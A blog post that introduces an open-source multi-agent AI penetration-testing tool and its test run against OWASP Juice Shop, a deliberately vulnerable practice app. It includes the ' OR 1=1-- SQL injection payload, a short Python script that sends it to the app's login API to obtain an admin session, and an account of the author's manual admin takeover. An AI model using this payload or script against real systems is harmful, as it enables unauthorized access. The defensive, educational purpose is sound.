DEV Community

Aaron Sood
I Built a Multi-Agent AI Pen Tester Because AI Coding Tools Are Shipping Vulnerable Code

AI coding assistants are everywhere. Developers are shipping code faster than ever using Claude, Copilot, and Cursor.
They're also shipping SQL injection, hardcoded secrets, broken authentication, and XSS - faster than ever.
The problem is obvious once you think about it: AI tools optimize for working code, not secure code. They'll write a login form that functions perfectly and is trivially bypassable with ' OR 1=1--. They'll hardcode an API key because it's the fastest way to make the demo work. They'll skip input validation because you didn't ask for it.
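To make that failure mode concrete, here is a minimal, self-contained sketch, using a toy in-memory SQLite table rather than any real app's code, of why string-built queries fall to ' OR 1=1-- while parameterized queries do not:

```python
import sqlite3

# Toy in-memory database (illustrative only): string concatenation turns
# attacker input into SQL syntax.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (email TEXT, password TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('admin@example.com', 's3cret', 'admin')")

def login_vulnerable(email, password):
    # The -- comment marker cuts off the password check entirely.
    query = f"SELECT role FROM users WHERE email = '{email}' AND password = '{password}'"
    return conn.execute(query).fetchone()

def login_safe(email, password):
    # Parameterized query: input stays data, never becomes syntax.
    return conn.execute(
        "SELECT role FROM users WHERE email = ? AND password = ?", (email, password)
    ).fetchone()

print(login_vulnerable("' OR 1=1--", "wrong"))  # ('admin',) - logged in with no credentials
print(login_safe("' OR 1=1--", "wrong"))        # None - payload matched as a literal string
```

The vulnerable query becomes `SELECT role FROM users WHERE email = '' OR 1=1--...`, which matches every row and returns the first user, typically the admin.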
Most solo developers and small teams will never hire a penetration tester. A basic pen test costs $500–$2,000 and takes weeks to schedule. So the vulnerabilities just ship.
I built VulnSwarm to fix that.

What VulnSwarm Does
VulnSwarm deploys a swarm of specialized AI agents that mirror a real penetration testing team. Instead of one model trying to do everything, each agent has a distinct role:
🔭 Recon Agent — maps the attack surface. Identifies entry points, fingerprints the tech stack, flags the highest-risk areas.
💥 Exploit Agent — takes the recon and determines what's actually exploitable. Rates each finding by severity, exploitability, and impact. Assigns CVSS-like scores.
🗡️ Red Team Agent — thinks like an attacker. Chains vulnerabilities together into realistic attack paths. Finds the worst-case scenario.
🛡️ Blue Team Agent — the defender. Takes everything the red team found and writes specific, code-level fixes. Prioritizes by effort vs. impact.
📄 Report Agent — synthesizes everything into a professional penetration testing report with an overall risk score, severity breakdown, and remediation roadmap.
The agents debate each other. The red team challenges the exploit analysis. The blue team pushes back on severity ratings. The result is more nuanced than any single model pass.
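A rough sketch of that hand-off, with the prompts and function names invented here for illustration (this is not VulnSwarm's actual API, and the debate loop is omitted); `llm` stands for any prompt-to-text callable:

```python
# Hypothetical sequential pipeline: each stage's output becomes the next
# stage's context. A real implementation would add the cross-agent debate.

def run_pipeline(target_summary: str, llm) -> str:
    recon = llm(f"Map the attack surface of: {target_summary}")
    exploits = llm(f"Rate severity and exploitability of:\n{recon}")
    chains = llm(f"Chain these findings into realistic attack paths:\n{exploits}")
    fixes = llm(f"Write code-level fixes, prioritized by effort vs. impact:\n{chains}")
    # The report agent sees every stage and synthesizes the final document.
    return llm(
        "Write a pen-test report with a risk score and remediation roadmap.\n"
        f"Findings:\n{exploits}\nAttack paths:\n{chains}\nFixes:\n{fixes}"
    )

# With a stub in place of a real model, the pipeline just threads text through:
report = run_pipeline("demo app", lambda prompt: prompt.splitlines()[0])
```

Swapping the stub for a real client (Ollama, Claude, etc.) changes only the `llm` callable, not the pipeline shape.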

Testing It on OWASP Juice Shop
To test VulnSwarm, I pointed it at OWASP Juice Shop — a deliberately vulnerable web app designed for security testing practice.
I also tested it manually first. In about 30 seconds I:

Logged in as admin using ' OR 1=1-- in the email field
Accessed the admin panel at /administration
Retrieved 21 user email addresses
Found an exposed crypto wallet seed phrase in customer feedback

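That manual login takes only a few lines to script. This is a hypothetical reproduction against a local Juice Shop instance; the /rest/user/login path is assumed from Juice Shop's REST API, and it should only ever be pointed at a target you own:

```python
import json
import urllib.request

# The same payload typed into the login form, sent directly to the API.
PAYLOAD = {"email": "' OR 1=1--", "password": "anything"}

def sqli_login(base_url: str) -> dict:
    """POST the injection payload; a vulnerable app returns the first user's session."""
    req = urllib.request.Request(
        f"{base_url}/rest/user/login",
        data=json.dumps(PAYLOAD).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)

# sqli_login("http://localhost:3000")  # run only against your own instance
```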
Then I ran VulnSwarm. Here's what it found automatically:
Risk Score: CRITICAL (90/100)

🔴 File Upload Endpoints — CVSS 9.0
Exploitable to inject malicious code or exfiltrate sensitive data.

🔴 Unvalidated API Endpoints — CVSS 9.0
API endpoints lack input validation and sanitization.

🟠 Missing Content-Security-Policy — CVSS 5.3
🟠 Missing Strict-Transport-Security — CVSS 5.3
🟠 Missing X-XSS-Protection — CVSS 5.3
🟠 Missing Referrer-Policy — CVSS 5.3
🟠 Missing Permissions-Policy — CVSS 5.3
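Findings like these come down to a presence check on the HTTP response headers. A minimal sketch of that check (illustrative, not VulnSwarm's actual scanner):

```python
# Hardening headers whose absence the scan flags above. Header name
# comparison is case-insensitive, as HTTP field names are.
REQUIRED_HEADERS = [
    "Content-Security-Policy",
    "Strict-Transport-Security",
    "X-XSS-Protection",
    "Referrer-Policy",
    "Permissions-Policy",
]

def missing_headers(response_headers: dict) -> list:
    """Return the required headers not present in the response."""
    present = {name.lower() for name in response_headers}
    return [h for h in REQUIRED_HEADERS if h.lower() not in present]

# A response that only sets CSP is missing the other four.
print(missing_headers({"Content-Security-Policy": "default-src 'self'"}))
```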
This ran in about 15 minutes on a CPU-only VPS using llama3.2:3b. Larger models produce deeper findings — the SQL injection I found manually would have been caught by qwen2.5:14b or Claude.

How the Multi-Agent Architecture Works
The key insight is that security analysis benefits from multiple perspectives arguing with each other — the same way a real security team works.
A single model asked "find vulnerabilities in this app" will produce a list. It won't challenge its own assumptions. It won't think about how vulnerabilities chain together. It won't prioritize fixes by what a developer can actually implement today.
The agent pipeline forces specialization:
```
Your Code/App
      │
      ▼
┌──────────┐    ┌───────────┐    ┌──────────┐    ┌──────────┐
│  Recon   │───▶│  Exploit  │───▶│ Red Team │───▶│   Blue   │
│  Agent   │    │   Agent   │    │  Agent   │    │   Team   │
└──────────┘    └───────────┘    └──────────┘    └────┬─────┘
                                                      │
                                                      ▼
                                                ┌──────────┐
                                                │  Report  │
                                                │  Agent   │
                                                └──────────┘
```
Each agent only sees what it needs to. The exploit agent doesn't know about fixes — it just finds problems. The blue team agent doesn't know about attack chains — it just writes solutions. The report agent synthesizes everything into something a developer or CTO can actually act on.
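One way to picture that scoping, with field and agent names invented here rather than taken from VulnSwarm's internals: each agent's context is built from an explicit allow-list of pipeline fields, so a role structurally cannot see data outside its scope.

```python
# Illustrative only. Intermediate pipeline outputs, keyed by stage:
PIPELINE_STATE = {
    "recon": "entry points, tech stack, high-risk areas",
    "exploits": "findings rated by severity and exploitability",
    "attack_chains": "red-team attack paths",
    "fixes": "code-level remediations",
}

# What each role is allowed to read:
AGENT_SCOPE = {
    "exploit": ["recon"],                              # finds problems, never sees fixes
    "red_team": ["recon", "exploits"],                 # chains findings into attacks
    "blue_team": ["exploits"],                         # writes fixes, never sees chains
    "report": ["exploits", "attack_chains", "fixes"],  # synthesizes everything
}

def build_context(agent: str) -> dict:
    """Return only the state fields this agent is allowed to read."""
    return {field: PIPELINE_STATE[field] for field in AGENT_SCOPE[agent]}
```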

Running It Yourself
VulnSwarm supports Claude, GPT-4o, Gemini, OpenRouter, and Ollama. If you want to run it completely free and locally:
```bash
git clone https://github.com/aaronsood/VulnSwarm.git
cd VulnSwarm
pip install -r requirements.txt

# Pull a local model
ollama pull llama3.2:3b

# Run it
python -m cli.main
```
For web app scanning, spin up a test target first:
```bash
docker run --rm -p 3000:3000 bkimminich/juice-shop
```
Then point VulnSwarm at http://localhost:3000.
Web scanning is localhost-only by default — VulnSwarm won't touch anything you don't own.

What It Doesn't Do (Yet)
VulnSwarm is early. It's a first pass, not a replacement for a professional security team.
It misses zero-days. It won't find novel attack chains that require deep business logic understanding. Smaller models miss things that larger models catch. It doesn't yet integrate with CI/CD pipelines or GitHub Actions.
The roadmap includes all of that. For now it solves the problem that matters most: the 99% of developers who ship with zero security review and no budget to fix that.

The Bigger Picture
There's something poetic about using AI to find the vulnerabilities that AI introduced. As AI coding tools become the default way software gets written, AI security tooling needs to keep pace.
VulnSwarm is open source, MIT licensed, and early. If you're in security or AI tooling, contributions are very welcome.
GitHub: github.com/aaronsood/VulnSwarm

Built and tested on a Saturday with a CPU-only VPS, a deliberately hackable web app, and too much coffee.
